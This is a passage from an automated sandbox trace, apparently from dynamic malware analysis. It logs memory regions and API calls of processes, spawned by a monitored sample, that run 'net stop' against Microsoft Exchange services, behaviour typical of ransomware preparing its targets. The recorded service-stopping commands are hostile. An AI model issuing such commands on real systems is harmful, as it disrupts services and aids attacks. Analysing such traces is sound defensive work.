"c:\\windows\\syswow64\\sspicli.dll") Region: id = 12880 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12881 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 12882 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12883 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12884 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 12885 start_va = 0x7eec0000 end_va = 0x7efbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eec0000" filename = "" Region: id = 12886 start_va = 0x7efea000 end_va = 0x7efecfff entry_point = 0x0 region_type = private name = "private_0x000000007efea000" filename = "" Region: id = 12887 start_va = 0x910000 end_va = 0x913fff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 12888 start_va = 0xa70000 end_va = 0xa72fff entry_point = 0xa70000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 12889 start_va = 0xbe0000 end_va = 0xc11fff entry_point = 0xbe0000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 784 os_tid = 0xd34 [0142.554] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0142.554] __set_app_type (_Type=0x1) [0142.554] __p__fmode () returned 0x77ac4d6c [0142.554] __p__commode () returned 0x77ac5b1c [0142.554] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0142.555] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0142.555] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.555] GetConsoleOutputCP () returned 0x1b5 [0142.556] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0142.556] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.558] sprintf_s (in: _DstBuf=0x9ffa60, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0142.558] setlocale (category=0, locale=".437") returned="English_United States.437" [0142.559] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0142.559] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0142.559] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeTransportLogSearch" [0142.559] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9ff808, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0142.559] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x9ff7fc | out: Buffer=0x9ff7fc*=0xc67f70) returned 0x0 [0142.559] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x9ff800 | out: Buffer=0x9ff800*=0xc67fb8) returned 0x0 [0142.559] __iob_func () returned 0x77ac1208 [0142.559] _fileno (_File=0x77ac1208) returned 0 [0142.559] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0142.559] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0142.559] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0142.559] _wcsicmp (_String1="config", _String2="stop") returned -16 [0142.559] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0142.559] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0142.559] _wcsicmp (_String1="file", _String2="stop") returned -13 [0142.559] _wcsicmp (_String1="files", _String2="stop") returned -13 [0142.559] _wcsicmp (_String1="group", _String2="stop") returned -12 [0142.559] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0142.559] _wcsicmp (_String1="help", _String2="stop") returned -11 [0142.559] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0142.559] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0142.559] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0142.559] _wcsicmp (_String1="session", _String2="stop") returned -15 [0142.559] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0142.559] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0142.559] _wcsicmp (_String1="share", _String2="stop") returned -12 [0142.559] _wcsicmp (_String1="start", _String2="stop") returned -14 [0142.559] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0142.559] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0142.559] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0142.559] _wcsicmp (_String1="accounts", _String2="MSExchangeTransportLogSearch") returned -12 [0142.559] _wcsicmp (_String1="computer", _String2="MSExchangeTransportLogSearch") returned -10 [0142.559] _wcsicmp (_String1="config", _String2="MSExchangeTransportLogSearch") returned -10 [0142.559] _wcsicmp (_String1="continue", _String2="MSExchangeTransportLogSearch") returned -10 [0142.559] _wcsicmp (_String1="cont", _String2="MSExchangeTransportLogSearch") returned -10 [0142.560] _wcsicmp (_String1="file", _String2="MSExchangeTransportLogSearch") returned -7 [0142.560] _wcsicmp (_String1="files", _String2="MSExchangeTransportLogSearch") returned -7 [0142.560] _wcsicmp (_String1="group", _String2="MSExchangeTransportLogSearch") returned -6 [0142.560] _wcsicmp (_String1="groups", _String2="MSExchangeTransportLogSearch") returned -6 [0142.560] _wcsicmp (_String1="help", _String2="MSExchangeTransportLogSearch") returned -5 [0142.560] _wcsicmp (_String1="helpmsg", _String2="MSExchangeTransportLogSearch") returned -5 [0142.560] _wcsicmp (_String1="localgroup", _String2="MSExchangeTransportLogSearch") returned -1 [0142.560] _wcsicmp (_String1="pause", _String2="MSExchangeTransportLogSearch") returned 3 [0142.560] _wcsicmp (_String1="session", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="sessions", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="sess", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="share", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="start", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="stats", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="statistics", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="stop", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="time", _String2="MSExchangeTransportLogSearch") returned 7 [0142.560] _wcsicmp (_String1="user", _String2="MSExchangeTransportLogSearch") returned 8 [0142.560] _wcsicmp (_String1="users", _String2="MSExchangeTransportLogSearch") returned 8 [0142.560] _wcsicmp (_String1="msg", _String2="MSExchangeTransportLogSearch") returned 2 [0142.560] _wcsicmp (_String1="messenger", _String2="MSExchangeTransportLogSearch") returned -14 [0142.560] _wcsicmp (_String1="receiver", _String2="MSExchangeTransportLogSearch") returned 5 [0142.560] _wcsicmp (_String1="rcv", _String2="MSExchangeTransportLogSearch") returned 5 [0142.560] _wcsicmp (_String1="netpopup", _String2="MSExchangeTransportLogSearch") returned 1 [0142.560] _wcsicmp (_String1="redirector", _String2="MSExchangeTransportLogSearch") returned 5 [0142.560] _wcsicmp (_String1="redir", _String2="MSExchangeTransportLogSearch") returned 5 [0142.560] _wcsicmp (_String1="rdr", _String2="MSExchangeTransportLogSearch") returned 5 [0142.560] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeTransportLogSearch") returned 10 [0142.560] _wcsicmp (_String1="work", _String2="MSExchangeTransportLogSearch") returned 10 [0142.560] _wcsicmp (_String1="wksta", _String2="MSExchangeTransportLogSearch") returned 10 [0142.560] _wcsicmp (_String1="prdr", _String2="MSExchangeTransportLogSearch") returned 3 [0142.560] _wcsicmp (_String1="devrdr", _String2="MSExchangeTransportLogSearch") returned -9 [0142.560] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeTransportLogSearch") returned -1 [0142.560] _wcsicmp (_String1="server", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="svr", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="srv", _String2="MSExchangeTransportLogSearch") returned 6 [0142.560] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeTransportLogSearch") returned -1 [0142.560] _wcsicmp (_String1="alerter", _String2="MSExchangeTransportLogSearch") returned -12 [0142.560] _wcsicmp (_String1="netlogon", _String2="MSExchangeTransportLogSearch") returned 1 [0142.560] _wcsupr (in: _String="MSExchangeTransportLogSearch" | out: _String="MSEXCHANGETRANSPORTLOGSEARCH") returned="MSEXCHANGETRANSPORTLOGSEARCH" [0142.560] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0xc62650 [0142.562] GetServiceKeyNameW (in: hSCManager=0xc62650, lpDisplayName="MSEXCHANGETRANSPORTLOGSEARCH", lpServiceName=0x10a8cb0, lpcchBuffer=0x9ff774 | out: lpServiceName="", lpcchBuffer=0x9ff774) returned 0 [0142.562] _wcsicmp (_String1="msg", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 2 [0142.562] _wcsicmp (_String1="messenger", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned -14 [0142.562] _wcsicmp (_String1="receiver", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 5 [0142.562] _wcsicmp (_String1="rcv", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 5 [0142.563] _wcsicmp (_String1="redirector", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 5 [0142.563] _wcsicmp (_String1="redir", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 5 [0142.563] _wcsicmp (_String1="rdr", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 5 [0142.563] _wcsicmp (_String1="workstation", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 10 [0142.563] _wcsicmp (_String1="work", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 10 [0142.563] _wcsicmp (_String1="wksta", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 10 [0142.563] _wcsicmp (_String1="prdr", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 3 [0142.563] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned -9 [0142.563] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned -1 [0142.563] _wcsicmp (_String1="server", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 6 [0142.563] _wcsicmp (_String1="svr", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 6 [0142.563] _wcsicmp (_String1="srv", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 6 [0142.563] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned -1 [0142.563] _wcsicmp (_String1="alerter", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned -12 [0142.563] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGETRANSPORTLOGSEARCH") returned 1 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="WORKSTATION") returned -10 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="LanmanWorkstation") returned 1 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="SERVER") returned -6 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="LanmanServer") returned 1 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="BROWSER") returned 11 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="BROWSER") returned 11 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="MESSENGER") returned 14 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="MESSENGER") returned 14 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="NETRUN") returned -1 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="NETRUN") returned -1 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="SPOOLER") returned -6 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="SPOOLER") returned -6 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="ALERTER") returned 12 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="ALERTER") returned 12 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="NETLOGON") returned -1 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="NETLOGON") returned -1 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="NETPOPUP") returned -1 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="NETPOPUP") returned -1 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="SQLSERVER") returned -6 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="SQLSERVER") returned -6 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="REPLICATOR") returned -5 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="REPLICATOR") returned -5 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="REMOTEBOOT") returned -5 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="REMOTEBOOT") returned -5 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="TIMESOURCE") returned -7 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="TIMESOURCE") returned -7 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="AFP") returned 12 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="AFP") returned 12 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="UPS") returned -8 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="UPS") returned -8 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="XACTSRV") returned -11 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="XACTSRV") returned -11 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="TCPIP") returned -7 [0142.563] _wcsicmp (_String1="MSEXCHANGETRANSPORTLOGSEARCH", _String2="TCPIP") returned -7 [0142.563] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xc6b088 [0142.564] OpenServiceW (hSCManager=0xc6b088, lpServiceName="MSEXCHANGETRANSPORTLOGSEARCH", dwDesiredAccess=0x84) returned 0x0 [0142.564] GetLastError () returned 0x424 [0142.564] CloseServiceHandle (hSCObject=0xc6b088) returned 1 [0142.564] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0142.564] LoadLibraryW (lpLibFileName="NETMSG") returned 0xa70000 [0142.565] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xa70000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0142.565] GetFileType (hFile=0x40) returned 0x2 [0142.566] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x9ff610 | out: lpMode=0x9ff610) returned 1 [0142.566] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x9ff61c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x9ff61c*=0x1e) returned 1 [0142.566] GetFileType (hFile=0x40) returned 0x2 [0142.566] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x9ff610 | out: lpMode=0x9ff610) returned 1 [0142.566] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9ff61c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x9ff61c*=0x2) returned 1 [0142.566] _ultow (in: _Dest=0x889, _Radix=10483248 | out: _Dest=0x889) returned="2185" [0142.566] FormatMessageW (in: dwFlags=0x2800, lpSource=0xa70000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0142.567] GetFileType (hFile=0x40) returned 0x2 [0142.567] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x9ff600 | out: lpMode=0x9ff600) returned 1 [0142.567] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x9ff60c, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x9ff60c*=0x34) returned 1 [0142.567] GetFileType (hFile=0x40) returned 0x2 [0142.567] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x9ff600 | out: lpMode=0x9ff600) returned 1 [0142.567] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9ff60c, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x9ff60c*=0x2) returned 1 [0142.567] NetApiBufferFree (Buffer=0xc67f70) returned 0x0 [0142.567] NetApiBufferFree (Buffer=0xc67fb8) returned 0x0 [0142.567] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeTransportLogSearch" [0142.567] exit (_Code=2) Thread: id = 785 os_tid = 0xdf0 Process: id = "273" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2ac94000" os_pid = "0xe10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeADTopology\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12890 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 12891 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 12892 start_va = 0x4410000 end_va = 0x442ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 12893 start_va = 0x4430000 end_va = 0x4430fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 12894 start_va = 0x4440000 end_va = 0x4453fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004440000" filename = "" Region: id = 12895 start_va = 0x4460000 end_va = 0x449ffff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 12896 start_va = 0x44a0000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 12897 start_va = 0x45a0000 end_va = 0x45a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045a0000" filename = "" Region: id = 12898 start_va = 0x45b0000 end_va = 0x45b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 12899 start_va = 0x45c0000 end_va = 0x45c1fff entry_point = 0x0 region_type = private name = "private_0x00000000045c0000" filename = "" Region: id = 12900 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12901 start_va = 0x7eae0000 end_va = 0x7eb02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eae0000" filename = "" Region: id = 12902 start_va = 0x7eb08000 end_va = 0x7eb08fff entry_point = 0x0 region_type = private name = "private_0x000000007eb08000" filename = "" Region: id = 12903 start_va = 0x7eb0a000 end_va = 0x7eb0cfff entry_point = 0x0 region_type = private name = "private_0x000000007eb0a000" filename = "" Region: id = 12904 start_va = 0x7eb0d000 end_va = 0x7eb0dfff entry_point = 0x0 region_type = private name = "private_0x000000007eb0d000" filename = "" Region: id = 12905 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12906 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12907 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12908 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12909 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12910 start_va = 0x45e0000 end_va = 0x45effff entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 12911 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12912 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12913 start_va = 0x4630000 end_va = 0x472ffff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 12914 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 12955 start_va = 0x4410000 end_va = 0x441ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004410000" filename = "" Region: id = 12956 start_va = 0x45f0000 end_va = 0x462ffff entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 12957 start_va = 0x4730000 end_va = 0x47edfff entry_point = 0x4730000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12958 start_va = 0x47f0000 end_va = 0x48effff entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 12959 start_va = 0x4a40000 end_va = 0x4a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 12960 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 12961 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 12962 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 12963 start_va = 0x7e9e0000 end_va = 0x7eadffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9e0000" filename = "" Region: id = 12964 start_va = 0x7eb05000 end_va = 0x7eb07fff entry_point = 0x0 region_type = private name = "private_0x000000007eb05000" filename = "" Region: id = 12965 start_va = 0x4420000 end_va = 0x4423fff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 12966 start_va = 0x4430000 end_va = 0x4433fff entry_point = 0x0 region_type = private name = "private_0x0000000004430000" filename = "" Region: id = 12967 start_va = 0x4a50000 end_va = 0x4d86fff entry_point = 0x4a50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 786 os_tid = 0xe0c [0142.717] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0142.717] __set_app_type (_Type=0x1) [0142.717] __p__fmode () returned 0x77ac4d6c [0142.717] __p__commode () returned 0x77ac5b1c [0142.717] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0142.717] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0142.717] GetCurrentThreadId () returned 0xe0c [0142.717] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe0c) returned 0x84 [0142.717] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0142.717] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0142.717] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.719] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0142.719] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x459fbd0 | out: phkResult=0x459fbd0*=0x0) returned 0x2 [0142.720] VirtualQuery (in: lpAddress=0x459fbd7, lpBuffer=0x459fb88, dwLength=0x1c | out: lpBuffer=0x459fb88*(BaseAddress=0x459f000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.720] VirtualQuery (in: lpAddress=0x44a0000, lpBuffer=0x459fb88, dwLength=0x1c | out: lpBuffer=0x459fb88*(BaseAddress=0x44a0000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0142.720] VirtualQuery (in: lpAddress=0x44a1000, lpBuffer=0x459fb88, dwLength=0x1c | out: lpBuffer=0x459fb88*(BaseAddress=0x44a1000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0142.720] VirtualQuery (in: lpAddress=0x44a3000, lpBuffer=0x459fb88, dwLength=0x1c | out: lpBuffer=0x459fb88*(BaseAddress=0x44a3000, AllocationBase=0x44a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0142.720] VirtualQuery (in: lpAddress=0x45a0000, lpBuffer=0x459fb88, dwLength=0x1c | out: lpBuffer=0x459fb88*(BaseAddress=0x45a0000, 